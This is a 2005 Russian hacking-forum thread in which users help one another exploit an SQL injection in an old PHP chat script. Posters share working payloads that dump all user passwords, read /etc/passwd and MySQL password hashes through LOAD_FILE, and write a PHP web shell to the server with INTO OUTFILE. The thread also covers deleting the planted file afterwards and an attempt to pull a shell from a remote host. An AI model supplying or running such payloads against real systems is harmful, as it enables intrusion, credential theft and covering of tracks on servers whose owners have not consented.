Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

22.10.2005, 20:37
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 41
Провел на форуме: 62530
Репутация:
1
|
|
sql-injection
Уважаемые,очень прошу помочь мне разобраться со следующей конструкцией:
На одном сервере установлен древний php скрипт одного чата с mysql базой.
Уязвимость заключается в скрипте редактирование профайла пользователей.Пример Запрос,типа
http://mysite.com/chе/usrs.php?L=russia&R='%20UNION%20SELECT%20pass,null ,null, null%20FROM%20%20register_user%20/*
выдаст нам из таблицы register_user все пароли зарегестрированных пользователей. Таким образом можно узнать все данные из базы данных.
А теперь самое интересное,как мне модифицировать запрос,чтобы я смог работать(просматривать) файлы на сервере.Буду очень благодарен!
Последний раз редактировалось insidex; 24.10.2005 в 17:14..
|
|
|

23.10.2005, 14:35
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
Вот так, если у тебя хватит прав:
http://mysite.com/chat/usersL.php3?L=russian&R='+UNION+SELECT+LOAD_FILE('/etc/passwd'),null,null,null+FROM+register_user/*
/etc/passwd заменяй, на нужный файл.
|
|
|

24.10.2005, 17:09
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 41
Провел на форуме: 62530
Репутация:
1
|
|
Спасибо за помощь! Очень помог!!!! Кста как ты правильно первый файл указал)))
p.s. please change your last post (address)
И еще один вопрос: возможно ли получить список файлов в какой-либо директории при помощи данной injection (права позволяют)
Последний раз редактировалось insidex; 24.10.2005 в 18:51..
|
|
|

24.10.2005, 22:11
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
Нет, читать содержимое директорий не получится.
Но если тебе хватает прав на чтение файлов, то можешь попробовать следующие вещи:
1. Залить шелл:
http://mysite.com/chat/usersL.php3?L=russian&R='+UNION+SELECT+'<?php',nul l,null,null+FROM+register_user+into+outfile+'../shell.php'/*
Дальше по анологии. Только не забудь поменять директорию, где есть права на запись.
2. Просмотри поле mysql.user.password в таблице mysql.user.
|
|
|

24.10.2005, 22:40
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 41
Провел на форуме: 62530
Репутация:
1
|
|
Блина емое,а как очистить.удалить файл поспешно созданный на сервере? Возможно такое?Спасибо.
Последний раз редактировалось insidex; 24.10.2005 в 23:30..
|
|
|

25.10.2005, 00:24
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме: 632524
Репутация:
9
|
|
<? system ("rm файл"); ?> Честно говоря не помню Как в Линуксе удаление... )))))
|
|
|

25.10.2005, 20:08
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
Ну шелл залей, а потом из него, как bul666 сказал: rm -rf ./file.php
|
|
|

07.11.2005, 09:43
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 41
Провел на форуме: 62530
Репутация:
1
|
|
http://site.com/vivat.php?r=russian&R='+UNION+SELECT+LOAD_FILE('ht tp://www.hiliv.narod.ru/shell.txt') ,null,null,null+FROM+reg_user+into+outfile+'/usr/local/www/site.com/picnic/shell.php'/*
На месте,где указан http адрес шелла http://www.hiliv.narod.ru/shell.txt, MySql громко икает с собщением об обшибке.Думаю виной здесь двойной слеш //. Можно ли как-то сформировать в данном случае успешный запрос.Заранее Приношу извинения за назойливость и огромное спасибо.
|
|
|

07.11.2005, 09:54
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 41
Провел на форуме: 62530
Репутация:
1
|
|
Забыл написать:
Выкидывается ошибка "MySQL error: 13 (Can't get stat of 'http:/www.hiliv.narod.ru/shell.txt'' (Errcode: 2)) "
|
|
|

07.11.2005, 11:44
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме: 4520553
Репутация:
1316
|
|
тык наверное mysql ищет файл указаный loadfile у себя, а не на удаленной тачке.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|